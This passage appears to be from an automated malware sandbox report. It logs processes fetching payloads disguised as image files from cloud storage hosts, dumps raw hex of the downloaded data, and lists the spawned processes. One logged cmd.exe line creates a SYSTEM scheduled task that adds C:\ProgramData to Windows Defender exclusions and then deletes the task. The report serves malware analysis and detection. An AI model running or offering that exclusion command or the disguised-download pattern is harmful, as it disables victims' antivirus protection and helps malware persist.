                                                                                                              Content-Type: image/jpeg
                                                                                                              Content-Length: 37274
                                                                                                              Connection: close
                                                                                                              x-oss-request-id: 6781E8BB53BCC6323541FF9C
                                                                                                              Accept-Ranges: bytes
                                                                                                              ETag: "6D4DEB9526F3973DE0F9DCE9392F8EA7"
                                                                                                              Last-Modified: Wed, 23 Oct 2024 04:47:27 GMT
                                                                                                              x-oss-object-type: Normal
                                                                                                              x-oss-hash-crc64ecma: 9193697774326766004
                                                                                                              x-oss-storage-class: Standard
                                                                                                              x-oss-ec: 0048-00000105
                                                                                                              Content-Disposition: attachment
                                                                                                              x-oss-force-download: true
                                                                                                              Content-MD5: bU3rlSbzlz3g+dzpOS+Opw==
                                                                                                              x-oss-server-time: 12


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.8 | 49764 | 118.178.60.9 | 443 | 4064 | C:\Users\user\Documents\l0tiFM.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 03:42:54 UTC | 110 | OUT | GET /f.dat HTTP/1.1
                                                                                                              User-Agent: GetData
                                                                                                              Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                                                                              Cache-Control: no-cache
2025-01-11 03:42:55 UTC | 558 | IN | HTTP/1.1 200 OK
                                                                                                              Server: AliyunOSS
                                                                                                              Date: Sat, 11 Jan 2025 03:42:54 GMT
                                                                                                              Content-Type: application/octet-stream
                                                                                                              Content-Length: 879
                                                                                                              Connection: close
                                                                                                              x-oss-request-id: 6781E8BEA7BABC37310D58F9
                                                                                                              Accept-Ranges: bytes
                                                                                                              ETag: "E54C4296F011EC91D935AA353C936E34"
                                                                                                              Last-Modified: Tue, 22 Oct 2024 18:02:54 GMT
                                                                                                              x-oss-object-type: Normal
                                                                                                              x-oss-hash-crc64ecma: 11142793972884948456
                                                                                                              x-oss-storage-class: Standard
                                                                                                              x-oss-ec: 0048-00000113
                                                                                                              Content-Disposition: attachment
                                                                                                              x-oss-force-download: true
                                                                                                              Content-MD5: 5UxClvAR7JHZNao1PJNuNA==
                                                                                                              x-oss-server-time: 4


                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                              9 | 192.168.2.8 | 49775 | 118.178.60.9 | 443 | 4064 | C:\Users\user\Documents\l0tiFM.exe
                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                              2025-01-11 03:42:56 UTC | 115 | OUT | GET /FOM-50.jpg HTTP/1.1
                                                                                                              User-Agent: GetData
                                                                                                              Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2025-01-11 03:42:56 UTC | 546 | IN | HTTP/1.1 200 OK
                                                                                                              Server: AliyunOSS
                                                                                                              Date: Sat, 11 Jan 2025 03:42:56 GMT
                                                                                                              Content-Type: image/jpeg
                                                                                                              Content-Length: 55085
                                                                                                              Connection: close
                                                                                                              x-oss-request-id: 6781E8C02E5F22343495DD75
                                                                                                              Accept-Ranges: bytes
                                                                                                              ETag: "DC44AE348E6A74B3A74871020FDFAC74"
                                                                                                              Last-Modified: Tue, 22 Oct 2024 14:47:46 GMT
                                                                                                              x-oss-object-type: Normal
                                                                                                              x-oss-hash-crc64ecma: 12339968747348072397
                                                                                                              x-oss-storage-class: Standard
                                                                                                              x-oss-ec: 0048-00000105
                                                                                                              Content-Disposition: attachment
                                                                                                              x-oss-force-download: true
                                                                                                              Content-MD5: 3ESuNI5qdLOnSHECD9+sdA==
                                                                                                              x-oss-server-time: 8


                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                              10 | 192.168.2.8 | 49790 | 118.178.60.9 | 443 | 4064 | C:\Users\user\Documents\l0tiFM.exe
                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                              2025-01-11 03:42:58 UTC | 115 | OUT | GET /FOM-51.jpg HTTP/1.1
                                                                                                              User-Agent: GetData
                                                                                                              Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2025-01-11 03:42:58 UTC | 547 | IN | HTTP/1.1 200 OK
                                                                                                              Server: AliyunOSS
                                                                                                              Date: Sat, 11 Jan 2025 03:42:58 GMT
                                                                                                              Content-Type: image/jpeg
                                                                                                              Content-Length: 4859125
                                                                                                              Connection: close
                                                                                                              x-oss-request-id: 6781E8C26FB42B3634D9AF8F
                                                                                                              Accept-Ranges: bytes
                                                                                                              ETag: "EE6CA3EEA7F9B1C81059AEF570A28C02"
                                                                                                              Last-Modified: Tue, 22 Oct 2024 14:48:26 GMT
                                                                                                              x-oss-object-type: Normal
                                                                                                              x-oss-hash-crc64ecma: 9060732723227198118
                                                                                                              x-oss-storage-class: Standard
                                                                                                              x-oss-ec: 0048-00000105
                                                                                                              Content-Disposition: attachment
                                                                                                              x-oss-force-download: true
                                                                                                              Content-MD5: 7myj7qf5scgQWa71cKKMAg==
                                                                                                              x-oss-server-time: 2


                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                              11 | 192.168.2.8 | 49870 | 118.178.60.9 | 443 | 4064 | C:\Users\user\Documents\l0tiFM.exe
                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                              2025-01-11 03:43:10 UTC | 115 | OUT | GET /FOM-52.jpg HTTP/1.1
                                                                                                              User-Agent: GetData
                                                                                                              Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2025-01-11 03:43:11 UTC | 547 | IN | HTTP/1.1 200 OK
                                                                                                              Server: AliyunOSS
                                                                                                              Date: Sat, 11 Jan 2025 03:43:11 GMT
                                                                                                              Content-Type: image/jpeg
                                                                                                              Content-Length: 5062442
                                                                                                              Connection: close
                                                                                                              x-oss-request-id: 6781E8CFA0BE373830D01AF9
                                                                                                              Accept-Ranges: bytes
                                                                                                              ETag: "70C21DA900796B279A09040B00953E40"
                                                                                                              Last-Modified: Mon, 18 Nov 2024 15:32:22 GMT
                                                                                                              x-oss-object-type: Normal
                                                                                                              x-oss-hash-crc64ecma: 360383310743409046
                                                                                                              x-oss-storage-class: Standard
                                                                                                              x-oss-ec: 0048-00000105
                                                                                                              Content-Disposition: attachment
                                                                                                              x-oss-force-download: true
                                                                                                              Content-MD5: cMIdqQB5ayeaCQQLAJU+QA==
                                                                                                              x-oss-server-time: 90


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.8 | 49942 | 118.178.60.9 | 443 | 4064 | C:\Users\user\Documents\l0tiFM.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 03:43:22 UTC | 115 | OUT | GET /FOM-53.jpg HTTP/1.1
User-Agent: GetData
Host: 22mm.oss-cn-hangzhou.aliyuncs.com
Cache-Control: no-cache
2025-01-11 03:43:22 UTC | 546 | IN | HTTP/1.1 200 OK
Server: AliyunOSS
Date: Sat, 11 Jan 2025 03:43:22 GMT
Content-Type: image/jpeg
Content-Length: 366410
Connection: close
x-oss-request-id: 6781E8DA2C1E9333356A3851
Accept-Ranges: bytes
ETag: "DA1D5EB665D3AAD523BE59415E6449ED"
Last-Modified: Tue, 22 Oct 2024 14:47:51 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 5641369857548672686
x-oss-storage-class: Standard
x-oss-ec: 0048-00000105
Content-Disposition: attachment
x-oss-force-download: true
Content-MD5: 2h1etmXTqtUjvllBXmRJ7Q==
x-oss-server-time: 3


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.8 | 49990 | 118.178.60.103 | 443 | 7124 | C:\Program Files (x86)\DfP1K3\DfP1K3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 03:43:50 UTC | 131 | OUT | GET /extra-task2.png HTTP/1.1
User-Agent: Chrome/114.0.0.0
Host: upitem.oss-cn-hangzhou.aliyuncs.com
Cache-Control: no-cache
2025-01-11 03:43:50 UTC | 548 | IN | HTTP/1.1 200 OK
Server: AliyunOSS
Date: Sat, 11 Jan 2025 03:43:50 GMT
Content-Type: image/png
Content-Length: 1589824
Connection: close
x-oss-request-id: 6781E8F62E5F22343071B976
Accept-Ranges: bytes
ETag: "BA024D16008C2932005DB859C94476A8"
Last-Modified: Tue, 07 May 2024 13:52:08 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 16714771568971376594
x-oss-storage-class: Standard
x-oss-ec: 0048-00000105
Content-Disposition: attachment
x-oss-force-download: true
Content-MD5: ugJNFgCMKTIAXbhZyUR2qA==
x-oss-server-time: 13


                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                              14 | 192.168.2.8 | 49991 | 118.178.60.103 | 443 | 7124 | C:\Program Files (x86)\DfP1K3\DfP1K3.exe
                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                              2025-01-11 03:43:54 UTC | 127 | OUT | GET /dsb-hr2.png HTTP/1.1
                                                                                                              User-Agent: Chrome/114.0.0.0
                                                                                                              Host: upitem.oss-cn-hangzhou.aliyuncs.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2025-01-11 03:43:54 UTC | 544 | IN | HTTP/1.1 200 OK
                                                                                                              Server: AliyunOSS
                                                                                                              Date: Sat, 11 Jan 2025 03:43:54 GMT
                                                                                                              Content-Type: image/png
                                                                                                              Content-Length: 57536
                                                                                                              Connection: close
                                                                                                              x-oss-request-id: 6781E8FA53726E363066B3D3
                                                                                                              Accept-Ranges: bytes
                                                                                                              ETag: "9E285C23C9DA187B313051DD6FEB4266"
                                                                                                              Last-Modified: Fri, 22 Mar 2024 09:16:17 GMT
                                                                                                              x-oss-object-type: Normal
                                                                                                              x-oss-hash-crc64ecma: 2580453812540855072
                                                                                                              x-oss-storage-class: Standard
                                                                                                              x-oss-ec: 0048-00000105
                                                                                                              Content-Disposition: attachment
                                                                                                              x-oss-force-download: true
                                                                                                              Content-MD5: nihcI8naGHsxMFHdb+tCZg==
                                                                                                              x-oss-server-time: 5


                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                              15 | 192.168.2.8 | 49992 | 118.178.60.103 | 443 | 7124 | C:\Program Files (x86)\DfP1K3\DfP1K3.exe
                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                              2025-01-11 03:43:56 UTC | 127 | OUT | GET /dsb-hr3.png HTTP/1.1
                                                                                                              User-Agent: Chrome/114.0.0.0
                                                                                                              Host: upitem.oss-cn-hangzhou.aliyuncs.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2025-01-11 03:43:56 UTC | 545 | IN | HTTP/1.1 200 OK
                                                                                                              Server: AliyunOSS
                                                                                                              Date: Sat, 11 Jan 2025 03:43:56 GMT
                                                                                                              Content-Type: image/png
                                                                                                              Content-Length: 357504
                                                                                                              Connection: close
                                                                                                              x-oss-request-id: 6781E8FC07D4B934366BFDBC
                                                                                                              Accept-Ranges: bytes
                                                                                                              ETag: "2977911419E268860C5E85E967E5C13E"
                                                                                                              Last-Modified: Sat, 13 Jul 2024 15:18:19 GMT
                                                                                                              x-oss-object-type: Normal
                                                                                                              x-oss-hash-crc64ecma: 9585452185678011734
                                                                                                              x-oss-storage-class: Standard
                                                                                                              x-oss-ec: 0048-00000105
                                                                                                              Content-Disposition: attachment
                                                                                                              x-oss-force-download: true
                                                                                                              Content-MD5: KXeRFBniaIYMXoXpZ+XBPg==
                                                                                                              x-oss-server-time: 7
                                                                                                              Data Ascii: K9L+/{m:#[.`Q-A*5{GyEQ6c;cW?j&"}+&Yd,B3qS4u:x6$+-k<aC9l*a?g{e/'{?x~\ks{n]^2Hdu!i{676;j0.`77
                                                                                                              2025-01-11 03:43:56 UTC4096INData Raw: eb 57 4f 63 5c cc 42 b4 4e bf a4 71 d9 c4 a8 49 0d 65 77 c9 28 ce dd 85 44 1d 86 43 86 9e 4c 31 21 d2 41 d6 fc f3 bc de 57 be bc 58 e3 8b fb 22 7b 1a 86 e3 b5 90 bd 7c ed 96 57 e0 ef 7c 8a 8d ba c2 78 12 a7 94 e4 bb 49 0f b8 5b 33 f1 9d 3e 3e 83 13 44 16 e4 19 28 30 da 19 f4 58 77 59 d1 c1 4f ac 78 89 0c ca e9 a6 41 52 57 95 42 28 4a 8f 9c b0 51 65 15 a1 0b 92 e0 b9 9b c0 98 83 0c df 14 3d 3c 13 cb f3 40 83 0a 1a 8c cc 39 8a 9e 7b 65 89 31 42 8b 8d ce 8d da c5 33 dc 6c c6 8d 33 83 bd 72 3f 33 af fd 57 98 2e 30 19 14 39 28 7f 84 26 6c bf ae 57 b7 0c 5b c0 26 4b ea c3 f3 48 0f c1 aa ad 31 a9 35 a4 56 90 3f 12 a1 4f fb 4d 96 19 ac 80 6a 02 10 f9 4f ce 02 88 a7 d2 90 84 bc 5d a2 a2 87 83 c7 f6 44 93 95 40 5d f0 9e 39 68 f6 e6 27 9a 0b a9 af c3 6b 96 a1 5e f3
                                                                                                              Data Ascii: WOc\BNqIew(DCL1!AWX"{|W|xI[3>>D(0XwYOxARWB(JQe=<@9{e1B3l3r?3W.09(&lW[&KH15V?OMjO]D@]9h'k^
                                                                                                              2025-01-11 03:43:56 UTC4096INData Raw: 1f 44 91 aa 8b bc 05 55 03 25 ad 18 97 34 b5 aa 8c f0 cc 5f 25 fe 7e 0c fd 4f 29 cb e1 a4 e0 20 0e bd 45 81 36 48 0a 71 60 3a f7 aa 87 1e b3 10 6a 07 b4 1d b1 96 74 37 22 11 0b 26 30 21 26 28 17 b6 eb fc 4c b5 b9 fb cb 96 eb f6 04 cd b8 89 74 bf 62 27 3c fa bc 45 d9 51 dd 8d eb a9 ec e5 6b d6 37 ac 4f c4 c1 47 dc e7 c6 ae 66 85 fd 6e 33 47 7e 0f a6 7e 01 e6 49 9e 0d 8e dd 9a 54 76 84 76 79 5e 0c ad 05 3c ce ea 42 ad b9 c5 50 dc 57 7b 35 83 ed 43 da 47 25 39 b8 55 1c 22 16 a3 3b bb 96 82 d0 3d 54 92 ee ce 23 db 18 6d 95 4b 32 2b 1c 6d 59 76 92 27 38 71 fb e0 b2 c3 ad 33 e4 dc e2 20 9f 4e 1d 8e eb 83 55 33 7e 82 7b 93 4e 81 47 e5 fe ec f6 06 42 20 0e 84 2f 83 23 59 3c 93 27 0b 7d 1c 35 cf ac aa eb 3c f4 69 3c e4 66 73 f1 97 fc c6 dd 8b 59 7a 05 bd d5 cf a8
                                                                                                              Data Ascii: DU%4_%~O) E6Hq`:jt7"&0!&(Ltb'<EQk7OGfn3G~~ITvvy^<BPW{5CG%9U";=T#mK2+mYv'8q3 NU3~{NGB /#Y<'}5<i<fsYz
                                                                                                              2025-01-11 03:43:56 UTC4096INData Raw: 92 b2 7c a6 cd 52 9d c4 97 c0 9e db 30 fb 5d a4 ad e8 a8 48 54 db c4 c1 2d 82 be f2 dc 34 c2 e0 cb c3 58 b2 ac 29 24 07 fa a6 d1 ea 1c 4c b8 cd aa 25 f8 5c 42 98 62 f2 68 ad 31 53 06 04 07 4d 6d 99 2f 1d 4e a4 e7 66 2a 65 fc 2b 8b e7 03 54 9c 74 34 bf 2b 4a ad f7 89 96 c1 21 6e 0c e5 8f 2e 55 92 dc a8 c9 6c 5f f9 cf 47 ac 2a 10 a4 fd 23 20 cd f4 0b d8 c2 64 65 7e d1 aa f0 2e c0 56 18 20 d3 64 35 42 41 0e cd b5 e6 ff 77 24 d1 22 03 fc 08 aa 26 41 31 02 36 c2 c6 9a e9 45 58 bd 2b e1 a7 1b 8e 70 44 7e ca 89 33 94 c7 b8 d3 3a e6 87 e2 2e 1d 32 fe 30 c3 a2 2e 39 fc 89 40 45 9a 99 55 3b 30 99 0f d2 b0 17 60 3a 1f e4 d9 79 05 f8 25 f5 fd c4 9a 07 f5 84 30 c2 ab ba 97 95 5f 75 c0 20 12 da 75 e7 ca c7 43 5e c7 6a 4d c7 60 89 11 d3 04 2b 8b da 31 20 6b d0 32 40 61
                                                                                                              Data Ascii: |R0]HT-4X)$L%\Bbh1SMm/Nf*e+Tt4+J!n.Ul_G*# de~.V d5BAw$"&A16EX+pD~3:.20.9@EU;0`:y%0_u uC^jM`+1 k2@a
                                                                                                              2025-01-11 03:43:56 UTC4096INData Raw: c1 4d 2c 3d ba 62 d6 96 71 ca d6 4b b5 58 cd 4a a4 11 4c a3 d0 89 6c 6b fc ee fc 4b 4d 35 c9 f7 95 4b 97 32 7e 44 2b 37 11 03 9b 99 91 5a f7 14 37 7b 37 cc 65 b7 a9 cf 8d f4 eb 41 46 51 24 fd 25 af fc 86 9c 1f c4 1a 54 8b 3b fb 7d 39 ec 48 e5 7f 21 a6 b6 db 76 55 bb 27 ea bc ab 6d 7a 28 4e ff 3f 9c a2 57 83 f5 fd 76 19 12 05 9b f5 d8 a8 07 9e 81 f9 12 bb 26 4a 6b ed d6 ac b7 f9 f9 e4 d0 bf 0b 9a 3f 49 46 40 63 f3 00 f8 8d e9 26 e6 fd 66 ea 99 8d bf e6 ed 98 de 15 fc 0a fa 0b ba 75 2e 1f a1 7f 27 dc bd a7 76 d8 98 91 91 79 63 58 d1 8a f8 f9 31 88 66 9b 7d 56 b3 ba 0e b5 ec 4a 54 b6 1e ff 15 5d 67 86 04 28 61 c5 76 22 30 7b 50 f4 8a 66 f7 1c 9a 39 a1 f9 22 90 d9 41 48 93 50 e7 2a 69 dc a7 cf e6 d3 6e 03 c6 19 7a c8 94 1a 5f 0e 7e ab c3 e2 8d 2e f0 f1 71 ae
                                                                                                              Data Ascii: M,=bqKXJLlkKM5K2~D+7Z7{7eAFQ$%T;}9H!vU'mz(N?Wv&Jk?IF@c&fu.'vycX1f}VJT]g(av"0{Pf9"AHP*inz_~.q
                                                                                                              2025-01-11 03:43:56 UTC4096INData Raw: 30 dc a8 86 8a 8d 57 75 88 45 99 d1 d6 cd 5e 4f 69 9a 0c 36 e9 b7 8c 7b 13 db f4 19 d3 01 f2 a0 48 d8 4a 89 2f 3d a8 74 d7 e8 bc 4e 70 18 9d 28 6f 98 b4 c2 9a 58 6d df dd 5a d6 24 eb bc eb 24 be b7 e7 d2 02 13 9f f6 92 b6 01 be 9c fc 5c fc bb e9 61 c9 a8 ce a6 f9 f3 10 cb 92 1b 91 59 ca 67 33 c9 33 97 8e ef 02 17 58 4b 63 e1 25 4d 3e e6 ca 69 0e f6 16 c5 bd d6 00 23 58 d8 ac a5 f3 37 34 59 c0 26 a9 c8 ca 47 33 aa 21 12 8e a1 b1 b4 45 97 58 5e 6f 86 95 92 32 de 10 ca 80 4e f0 3d 38 e8 2d 31 d9 4c 0d b0 ea 9d fa 03 af da e5 ce 06 fc 7f 93 1d e9 86 84 10 f1 fb ce 8e fc 26 c1 f6 91 f9 f1 c1 d7 80 5e 3b af 0c f1 52 ec 21 96 8e 81 7e ac 0d f8 ec cb 67 6c 10 b0 83 83 0a 12 b5 22 d5 b5 b0 18 73 d5 76 a3 88 37 35 b4 11 43 0b 74 ea 9e 40 2e 90 e2 29 c1 e9 02 56 dc
                                                                                                              Data Ascii: 0WuE^Oi6{HJ/=tNp(oXmZ$$\aYg33XKc%M>i#X74Y&G3!EX^o2N=8-1L&^;R!~gl"sv75Ct@.)V


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.8 | 49993 | 118.178.60.103 | 443 | 7124 | C:\Program Files (x86)\DfP1K3\DfP1K3.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-11 03:43:58 UTC | 127 | OUT | GET /dsb-hr1.png HTTP/1.1
User-Agent: Chrome/114.0.0.0
Host: upitem.oss-cn-hangzhou.aliyuncs.com
Cache-Control: no-cache
2025-01-11 03:43:59 UTC | 546 | IN | HTTP/1.1 200 OK
Server: AliyunOSS
Date: Sat, 11 Jan 2025 03:43:59 GMT
Content-Type: image/png
Content-Length: 486896
Connection: close
x-oss-request-id: 6781E8FF3D53853136D38BEE
Accept-Ranges: bytes
ETag: "8FB4D4B3DCE57A2C6F9FF2278B5BAE86"
Last-Modified: Fri, 22 Mar 2024 09:16:17 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 13263015917138006152
x-oss-storage-class: Standard
x-oss-ec: 0048-00000105
Content-Disposition: attachment
x-oss-force-download: true
Content-MD5: j7TUs9zleixvn/Ini1uuhg==
x-oss-server-time: 6


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.8 | 49994 | 118.178.60.103 | 443 | 916 | C:\ProgramData\efk2JUeS\lBoqoqIC.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-11 03:44:03 UTC | 128 | OUT | GET /page-404.png HTTP/1.1
User-Agent: Chrome/114.0.0.0
Host: upitem.oss-cn-hangzhou.aliyuncs.com
Cache-Control: no-cache
2025-01-11 03:44:04 UTC | 545 | IN | HTTP/1.1 200 OK
Server: AliyunOSS
Date: Sat, 11 Jan 2025 03:44:03 GMT
Content-Type: image/png
Content-Length: 670784
Connection: close
x-oss-request-id: 6781E903DC44E03633DD6DEC
Accept-Ranges: bytes
ETag: "06C2604A6B2E157543D6812D4F88D743"
Last-Modified: Sat, 13 Jul 2024 15:18:20 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 8552415919623655984
x-oss-storage-class: Standard
x-oss-ec: 0048-00000105
Content-Disposition: attachment
x-oss-force-download: true
Content-MD5: BsJgSmsuFXVD1oEtT4jXQw==
x-oss-server-time: 1
                                                                                                              Data Ascii: k,0P9I69b_~=|>~z/4/A29LlRtEdf?8Il`=,_({n3[d1Ts.O/tXrrr(NTs0ISV_7M{T4~qNoMsIu~DpBp-}
                                                                                                              2025-01-11 03:44:04 UTC4096INData Raw: 80 c4 c8 c5 dd 50 ba e4 94 f1 a8 a7 ae 54 6f ff 14 96 ec c2 33 db da 21 9e c8 93 12 85 10 2c df e2 b3 92 cc e6 d4 27 0c ee 1d 3e ff 5c 2d 7f 29 dd ba 3e 5d de 45 b4 31 e2 bb fd 58 02 1d 6c 60 54 ae 52 bd 8b 10 df 0f f3 f6 31 08 d3 8b b2 a4 bb 70 a9 72 35 3b 68 db d1 50 d0 03 79 6a 00 67 57 7b 75 e6 e3 d5 40 fc d2 53 d2 57 3d c9 33 e3 db 54 37 56 87 25 cf fa 60 d0 97 89 3e 53 30 f9 f1 a0 b0 73 28 81 42 c2 91 64 2e ac b8 08 32 33 30 ff 4b 86 25 74 c1 71 82 c8 49 7a 35 09 0f 05 01 2f 40 a2 9a 28 a2 1c aa 3a 99 37 15 7b 2b 1d 8f 7c 82 99 a0 3a 40 ed 62 78 ab af f6 33 63 3e 03 87 00 ea e8 ee f8 16 76 61 d3 46 07 6d f3 f4 4b c6 df ff f5 95 7a e3 92 04 c6 15 b7 79 f8 c2 d7 94 d4 8b f3 7c 3d c3 d2 56 01 2f 1e 0b da b2 5e 8f cc 6e 28 56 e9 17 25 ba 80 b5 36 59 4d
                                                                                                              Data Ascii: PTo3!,'>\-)>]E1Xl`TR1pr5;hPyjgW{u@SW=3T7V%`>S0s(Bd.230K%tqIz5/@(:7{+|:@bx3c>vaFmKzy|=V/^n(V%6YM
                                                                                                              2025-01-11 03:44:04 UTC4096INData Raw: 05 7f 4b 52 2f 62 fa 20 83 8b fb 64 20 05 27 ab 09 b1 77 bf 16 24 c2 62 f5 0c bc 5a 53 23 36 05 dd 55 d4 80 3f 65 96 11 fd 76 aa ec d6 93 bc f0 97 62 21 6a d7 b0 c4 c4 cc e5 ff bc 0f 6f d3 02 99 31 6b 63 af 13 74 ff c9 48 61 1a 38 08 80 d5 a9 0e 2e 61 67 56 37 63 b4 e8 e6 f4 ca 9b 66 bc f7 96 23 79 3b 9e e8 f2 12 79 5f 0c 70 c3 65 c3 d1 22 10 7d 90 dc 8b e9 6d 17 86 38 85 07 7e c1 dd 44 1c bd 4b ef b6 2e e6 1a 8e 77 74 6f f2 80 a7 d7 0e 5a 54 a6 18 a5 be df 6b 42 45 7e 3e 6f ce 8b 02 f8 54 ba 74 31 da 5a d4 7a ee 1a ff 50 2c 0f e8 e7 ad b9 38 3f 45 9e 5e 59 b2 94 b7 cf d8 43 8c fb 45 71 c5 e3 86 75 e6 73 2d 68 92 10 52 3d f1 aa b6 7f c3 72 9e c8 04 e1 66 ef 95 5f a8 17 50 5b 56 2a 4a dd 43 cd 5b 91 97 27 97 49 c9 34 0c ea a6 a1 65 97 60 4c 39 5f ac 4b 18
                                                                                                              Data Ascii: KR/b d 'w$bZS#6U?evb!jo1kctHa8.agV7cf#y;y_pe"}m8~DK.wtoZTkBE~>oTt1ZzP,8?E^YCEqus-hR=rf_P[V*JC['I4e`L9_K
                                                                                                              2025-01-11 03:44:04 UTC4096INData Raw: b8 92 27 e4 10 6e f5 e7 99 91 71 c9 b2 ca 43 b0 64 6d 0a 65 04 68 e4 ac 07 70 05 f4 3e 0b 5e c0 35 6f 56 6c 30 2b 26 72 7c 9a 7c 1b a8 c4 6a 33 87 ab c0 e3 34 00 a7 40 36 2f 1d ac 7f dc 86 60 f2 ce 1e 74 e0 56 2d d6 b4 88 45 65 f4 0a 6e 72 f9 73 7a 9a 6d b8 1e 63 89 56 9b f6 0e 32 61 55 85 d5 26 7c e9 17 b9 2d 77 d7 6f 8d bb 4d 11 be 01 f6 d6 2b 78 ab 42 5d 14 91 ea e0 5f bd 9b 2d 33 de bd 92 a0 38 4d 25 3f 84 6d 78 3c d9 1b 1a 9b c3 24 a3 a6 2d 83 e6 9b 25 ee 2a 40 50 c3 5c 2b f9 1d 2e f6 a8 d3 f8 41 7a f4 c0 26 de 1e 98 00 6f 78 4d e2 7e c8 3a 5a cb 5c 34 40 b3 9f 3d 6a c3 cb 35 dd 7a 0f d5 8e db 1b 04 bc de 1e 43 aa 85 e1 de f4 c0 c3 a2 ce 9c 09 c4 04 1a 67 74 50 f4 7b 3c b6 89 87 5f 59 d3 3a 47 e9 89 e6 7e 38 90 00 e8 e1 19 5d 8e 65 cb db 3f 3e 25 72
                                                                                                              Data Ascii: 'nqCdmehp>^5oVl0+&r||j34@6/`tV-EenrszmcV2aU&|-woM+xB]_-38M%?mx<$-%*@P\+.Az&oxM~:Z\4@=j5zCgtP{<_Y:G~8]e?>%r



                                                                                                              Target ID:0
                                                                                                              Start time:22:41:33
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Users\user\Desktop\2976587-987347589.07.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Users\user\Desktop\2976587-987347589.07.exe"
                                                                                                              Imagebase:0x140000000
                                                                                                              File size:30'887'936 bytes
                                                                                                              MD5 hash:67AB54B4FC69F4175D217DD57154A27C
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:6
                                                                                                              Start time:22:42:34
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Users\user\Documents\l0tiFM.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Users\user\Documents\l0tiFM.exe
                                                                                                              Imagebase:0x140000000
                                                                                                              File size:133'136 bytes
                                                                                                              MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 0%, ReversingLabs
                                                                                                              Reputation:moderate
                                                                                                              Has exited:true

                                                                                                              Target ID:7
                                                                                                              Start time:22:42:36
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Users\user\Documents\l0tiFM.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Users\user\Documents\l0tiFM.exe
                                                                                                              Imagebase:0x140000000
                                                                                                              File size:133'136 bytes
                                                                                                              MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:moderate
                                                                                                              Has exited:false

                                                                                                              Target ID:9
                                                                                                              Start time:22:42:47
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                                                                              Imagebase:0x7ff731660000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:10
                                                                                                              Start time:22:42:47
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff6ee680000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:11
                                                                                                              Start time:22:42:48
                                                                                                              Start date:10/01/2025
